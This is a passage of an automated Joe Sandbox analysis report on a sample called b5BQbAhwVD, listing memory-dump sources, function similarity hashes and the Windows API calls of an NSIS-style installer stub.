                                                                                                                  • Opcode Fuzzy Hash: 0f9fa4e4740e4f744d1ea39f8a370289c91c58984c2c8beb5872bbacf8cc7c52
                                                                                                                  • Instruction Fuzzy Hash: 4BC08C3026C304CFE200AA1ECC84A5173ACEF85B04F0098E0F5088B629CA62FC004604
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360462919.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_150000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cbefea90d074bac668324f92afcec7690d6882e35fc5f1e2e80a9313afd4dbef
                                                                                                                  • Instruction ID: b99b75ad732712937fe40652e76eed15c000c82085b76670c61891a725a6e169
                                                                                                                  • Opcode Fuzzy Hash: cbefea90d074bac668324f92afcec7690d6882e35fc5f1e2e80a9313afd4dbef
                                                                                                                  • Instruction Fuzzy Hash: 03A0223C30000283C20CEB00E000C0FE3832FE0200B00C22C0000020A0B820CC008023
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32 ref: 004034C8
                                                                                                                  • GetVersion.KERNEL32 ref: 004034CE
                                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                                  • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                                  • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                                  • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                                  • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                    • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                    • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                  • GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                                  • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                                  • lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                                  • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                                  • lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                                  • DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                    • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                                  • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                                  • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                                  • lstrcatW.KERNEL32(00437800,0040A328,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                                  • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                                  • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                                  • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                                  • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                                  • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                                  • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                  • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                  • API String ID: 3441113951-334447862
                                                                                                                  • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                                  • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                                  • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                                  • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                                  • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                                  • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                  • String ID: $M$N
                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                  • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                                  • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                                  • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                                  • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                                  APIs
                                                                                                                  • DeleteFileW.KERNEL32(?,?,00437800,76232EE0,00000000), ref: 00405B23
                                                                                                                  • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,76232EE0,00000000), ref: 00405B6B
                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,76232EE0,00000000), ref: 00405B8E
                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,76232EE0,00000000), ref: 00405B94
                                                                                                                  • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,76232EE0,00000000), ref: 00405BA4
                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                  • String ID: 0WB$\*.*
                                                                                                                  • API String ID: 2035342205-351390296
                                                                                                                  • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                                  • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                                  • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                                  • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                  • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                                  • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                  • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76232EE0,00405B1A,?,00437800,76232EE0), ref: 00406736
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                  • String ID: xgB
                                                                                                                  • API String ID: 2295610775-399326502
                                                                                                                  • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                  • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                                  • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                  • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: _6,
                                                                                                                  • API String ID: 0-4239174906
                                                                                                                  • Opcode ID: 89c34edf7f32382e33816baf3c7f18fe4aa3c59fc26fd54aea906a3625de18c9
                                                                                                                  • Instruction ID: a4f2bd16cf8c15ac19016c1044bfbc48c25e08a8ff54ed9f744798bc974ce0d1
                                                                                                                  • Opcode Fuzzy Hash: 89c34edf7f32382e33816baf3c7f18fe4aa3c59fc26fd54aea906a3625de18c9
                                                                                                                  • Instruction Fuzzy Hash: 5FC1B274E01218CFDB54DFA5C994B9DBBB2AF89300F2081A9D419BB365DB359E85CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3cc71eccf9eaedc8250b34f9a74ed4d13ba2bcc5c6dc0930c1d663e06c0b8a7a
                                                                                                                  • Instruction ID: 2e62483f4961185091498d2fd346b1f05a4556503c5bc233d72ef49e8c6be328
                                                                                                                  • Opcode Fuzzy Hash: 3cc71eccf9eaedc8250b34f9a74ed4d13ba2bcc5c6dc0930c1d663e06c0b8a7a
                                                                                                                  • Instruction Fuzzy Hash: 3A629C74A01229CFDB65DF65C884BDDBBB2BB89301F1081E9E809A7355DB319E82DF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a732fbfc40af40d081e21f2e1d6ceea1dbe21982c57ebfb9969d68a77500cad4
                                                                                                                  • Instruction ID: 949fd8ce16527b82cc62dddf01a5f8c12b87d38256f17fd49f507581673242a7
                                                                                                                  • Opcode Fuzzy Hash: a732fbfc40af40d081e21f2e1d6ceea1dbe21982c57ebfb9969d68a77500cad4
                                                                                                                  • Instruction Fuzzy Hash: 1CC1B174E01218CFDB54DFA9C994B9DBBB2BF89300F2081A9D419BB355DB359A86CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 32cf52dfe4c2764293dcd45fd72d7af30b1d70d854755a11963987dca86ce064
                                                                                                                  • Instruction ID: aac2f84e08d725f3c883bb306c397c1fe5d5ecf2be2b10b1164d8acca416ce69
                                                                                                                  • Opcode Fuzzy Hash: 32cf52dfe4c2764293dcd45fd72d7af30b1d70d854755a11963987dca86ce064
                                                                                                                  • Instruction Fuzzy Hash: B6C1B074E01218CFDB54DFA9C994B9DBBB2AF89300F2081A9D419BB355DB359A86CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dd713ce6a81a1d07f0846585ec5a3d5f7f5c8256f0a5e29c89941e6bad2403a0
                                                                                                                  • Instruction ID: 4e1f8b35293b856f14a190267966d6584c6099824041789333e7280ad989fef7
                                                                                                                  • Opcode Fuzzy Hash: dd713ce6a81a1d07f0846585ec5a3d5f7f5c8256f0a5e29c89941e6bad2403a0
                                                                                                                  • Instruction Fuzzy Hash: 77C1A174E01218CFDB54DFA9C994B9DBBB2AF89300F2081A9D409BB355DB359E86CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 04c0a1f0fb1ab16d3f2150953673014388ce3453aa01c79e4632c9650139a101
                                                                                                                  • Instruction ID: 8185e0e8503cfbaaad8895bc16a2ff01080919180c2a9aae563c51eb424d034b
                                                                                                                  • Opcode Fuzzy Hash: 04c0a1f0fb1ab16d3f2150953673014388ce3453aa01c79e4632c9650139a101
                                                                                                                  • Instruction Fuzzy Hash: D2C1A074E01218CFDB54DFA9C994B9DBBB2AF89300F2081A9D419BB365DB359A85CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8f087addd43d870863d2f758db98c2eb297aff4a54ff1d1c3c1573aac8b4a67a
                                                                                                                  • Instruction ID: c81e5ef0379bb5ed895b2db5a2b71e9da8517d89e382eb10447340bd65df6d9a
                                                                                                                  • Opcode Fuzzy Hash: 8f087addd43d870863d2f758db98c2eb297aff4a54ff1d1c3c1573aac8b4a67a
                                                                                                                  • Instruction Fuzzy Hash: 45C1B074E01218CFEB54DFA5C994B9DBBB2BF89300F2081A9D419BB355DB359A85CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 202ddc492ca191a497547ad8a8879bdd8b3f07ddcf76cfa82979c2c8681e8a54
                                                                                                                  • Instruction ID: 3f3947c01020391d8f27f8e0f282db1df393994aba683d0dc2d6e72d2d17c9c4
                                                                                                                  • Opcode Fuzzy Hash: 202ddc492ca191a497547ad8a8879bdd8b3f07ddcf76cfa82979c2c8681e8a54
                                                                                                                  • Instruction Fuzzy Hash: AFC1B174E00218CFEB54DFA5C944B9DBBB2BF89300F2080A9D819BB355DB359A85CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 03d1f4158063210da1ea947782565afe380b1d223bf6b4980d7001ecdc73f875
                                                                                                                  • Instruction ID: 647f186083fc0bcd84ded0543c092e8d9d54459cbf847473e850bd9322b4b657
                                                                                                                  • Opcode Fuzzy Hash: 03d1f4158063210da1ea947782565afe380b1d223bf6b4980d7001ecdc73f875
                                                                                                                  • Instruction Fuzzy Hash: 1FC1A074E01218CFDB54DFA5C994B9DBBB2EF89300F6080A9D819BB355DB359A85CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 600aa9e159601fbc3054df0425461081c7cce8c31b9005e162728ddbc7b45b8e
                                                                                                                  • Instruction ID: e4254fc199f98899ad94b54c5bfa74b17cfbc6e6b3b9d1ed97353c9b7425751e
                                                                                                                  • Opcode Fuzzy Hash: 600aa9e159601fbc3054df0425461081c7cce8c31b9005e162728ddbc7b45b8e
                                                                                                                  • Instruction Fuzzy Hash: B9C1AF74E01218CFEB54DFA5C994B9DBBB2AF89300F2081A9D819BB355DB359E81CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 03ec44cdbfc6842278c3c3664413adcaeb88f704bd417ef337827721f7e3f2df
                                                                                                                  • Instruction ID: 2e4a7f36a1ee136f4e98492b0e45187db5a3060668f2f1548d1ab30679d65396
                                                                                                                  • Opcode Fuzzy Hash: 03ec44cdbfc6842278c3c3664413adcaeb88f704bd417ef337827721f7e3f2df
                                                                                                                  • Instruction Fuzzy Hash: 92C1B074E01218CFEB54DFA5C984B9DBBB2BF89301F2080A9D819BB355DB359A81CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7d57579cad98e957ac6cd87bb1904580454070f09f0f1fe4f2486753f6f1ca99
                                                                                                                  • Instruction ID: 9b1c3f88feba0829096d5c21f946fb8a194a5246004834e60dade39b857438da
                                                                                                                  • Opcode Fuzzy Hash: 7d57579cad98e957ac6cd87bb1904580454070f09f0f1fe4f2486753f6f1ca99
                                                                                                                  • Instruction Fuzzy Hash: 3DC1A074E01218CFEB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5a1a3af4cb7fd3594ee3f2e7426c3f599ae0966fa2184efe6894a6c4943edada
                                                                                                                  • Instruction ID: 6bdddf66d5be2f403b17415836ae43fcc6220f462be82c767f74c36858641e51
                                                                                                                  • Opcode Fuzzy Hash: 5a1a3af4cb7fd3594ee3f2e7426c3f599ae0966fa2184efe6894a6c4943edada
                                                                                                                  • Instruction Fuzzy Hash: F9C1B074E00258CFDB54DFA9C994B9DBBB2BF89300F2081A9D819BB355DB359A81CF10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 747b27a3532d44f78fe314bed45c5ee34e6c0f21a96fea3962446adc77b14bb0
                                                                                                                  • Instruction ID: 014b0a9098af5a1af66a64883afd89274e4e09624f55299db435439a7ad784f3
